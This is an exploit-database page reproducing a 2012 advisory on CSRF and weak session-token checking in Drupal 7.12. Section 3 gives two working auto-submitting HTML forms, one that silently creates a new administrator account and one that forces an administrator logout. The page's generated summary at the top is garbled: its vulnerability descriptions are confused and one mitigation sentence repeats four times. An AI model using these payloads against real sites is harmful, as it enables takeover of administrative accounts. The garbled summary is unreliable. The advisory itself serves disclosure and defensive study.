Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities

vendor:

Drupal CMS

by:

Ivano Binetti

6,8

CVSS

MEDIUM

Multiple Vulnerabilities

352, 643, 644, 645

CWE

Product Name: Drupal CMS

Affected Version From: 7.12

Affected Version To: 7.12

Patch Exists: YES

Related CWE: N/A

CPE: drupal:drupal

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian Squeeze (6.0)

2012

Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities

Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain administrative access to the CMS. The first vulnerability is a CSRF which could allow an attacker to change any Drupal settings. The second vulnerability is a CSRF which could allow an attacker to force administrator logout. The third vulnerability is a POST and GET method which could allow an attacker to gain administrative access to the CMS. The fourth vulnerability is a Http Referer which could allow an attacker to gain administrative access to the CMS. The exploit is a POST and GET method which could allow an attacker to gain administrative access to the CMS. The exploit is a CSRF which could allow an attacker to force administrator logout.

Mitigation:

Ensure that all user input is validated and sanitized before being used in any application logic. Ensure that all user input is validated and sanitized before being used in any application logic. Ensure that all user input is validated and sanitized before being used in any application logic. Ensure that all user input is validated and sanitized before being used in any application logic.

Source

Exploit-DB raw data:

+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title    : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities 
# Date             : 02-03-2012
# Author           : Ivano Binetti (http://ivanobinetti.com)
# Software link    : http://ftp.drupal.org/files/projects/drupal-7.12.zip
# Vendor site      : http://drupal.org
# Version          : 7.12 (and lower)
# Tested on        : Debian Squeeze (6.0) 
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html
# EDB-ID           : 18564 (http://www.exploit-db.com/exploits/18564/)   
# Other Advisory   : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html
# Other Advisory   : http://www.1337day.com/exploits/17611
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------------------------------------------+
Summary

1)Introduction
2)Vulnerabilities Description 
 2.1 Poor Session Checking (CSRF to change any Drupal settings)
 2.2 Poor Session Checking (CSRF to Force administrator logout)
 2.3 Poor Session Checking (POST and GET method)
 2.4 Poor Session Checking (Http Referer)
3)Exploit
 3.1 Exploit (Add Administrator)
 3.2 Exploit (Force logout)

+---------------------------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
Drupal "is an open source content management platform powering millions of websites and applications. Its built, used, and supported by an active
and diverse community of people around the world".

2)Vulnerability Description 
Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface.

 2.1 Poor Session Checking (CSRF to change any Drupal settings)
 Drupal, to secure changes made by administrators or users through web management interface, uses "form_token" parameter which is sent inside 
 any http POST request. 
 There is a security flaw inside the logic with which this parameter is generated, as is used the same parameter for for similar operations 
 (the same "form_id") in the same session (for example for article's creation Drupal assigns the same "form_token", for admin/user
 creation Drupal assigns the same "form_token" and so on).
 Another flaw is inside "form_buid_id" parameter, which is used to fetch state from a database table during certain operations. This parameter
 is generated different for any operation an admin/user performs, but Drupal allows to use any other Drupal generated "form_buid_id" parameter
 (like this: "form-0iFqLlofT1uuJ_uwXPNdVlc_J9KL20oZE15dK9hxuQ8") to make changes to Drupal settings through web management  interface. 
 So, even if Drupal  creates a different "form_buid_id" for any operation you can use another "form_buid_id"compatible with Drupal instead of that
 generated by Drupa for that specific operation.
 These flaws can be used by an attacker who knows the values of "form_buid_id" and "form_token" parameters (for example an internal attacker
 performing a "Man in The Middle Attack" or an external attacker that controls an internal client by an client-side exploit, an external attacker 
 that controls directly a Drupal admin by a client-side exploit and son on. There are many possibilities) to create an "ad-hoc" crafted web page 
 in order to makes any Drupal changes (add administrator, delete administrator, add web pages, delete web pages, ....) when a Drupal administrator
 or User browses that crafted web page.
 
 
 2.2 Poor Session Checking (CSRF to Force administrator logout)
 There is another vulnerability - always related to poor session checking / improper input validation - in "<drupal_ip>/user/logout" which allows
 an attacker to create a crafted web page an force logout of Drupal administrator/users at web management interface. This vulnerability - forcing 
 administrator logout - will aid an attacker to sniff authentication credentials when a "Man in The Middle Attack" is performed.

 2.3 Poor Session Checking (POST and GET method)
 Drupal does not check "GET" or "POST" http method allowing, even though normal logout is made via http GET request, to exploit the above vulnerability  
 using http POST method. 
 
 2.4 Poor Session Checking (Http Referer)
 Drupal, furthermore, does not perform "http referer" checking, allowing to exploit all above described vulnerabilities.

3)Exploit 

 3.1 Exploit (Add Administrator)
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit change user to admin</H2>
 <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay">
 <input type="hidden" name="name" value="new_admin"/>
 <input type="hidden" name="mail" value="new_admin@new_admin.com"/>
 <input type="hidden" name="pass[pass1]" value="new_password"/>
 <input type="hidden" name="pass[pass2]" value="new_password"/>
 <input type="hidden" name="status" value="1"/>
 <input type="hidden" name="roles[3]" value="3"/>
 <input type="hidden" name="timezone" value="Europe/Prague"/>
 <input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
 <input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
 <input type="hidden" name="form_id" value="user_register_form"/>
 <input type="hidden" name="op" value="Create new account"/>
 </form>
 </body>
 </html>


 3.2 Exploit (Force logout)
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to logout Admin</H2>
 <form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout">
 </form>
 </body>
 </html>


+--------------------------------------------------------------------------------------------------------------------------------------------------+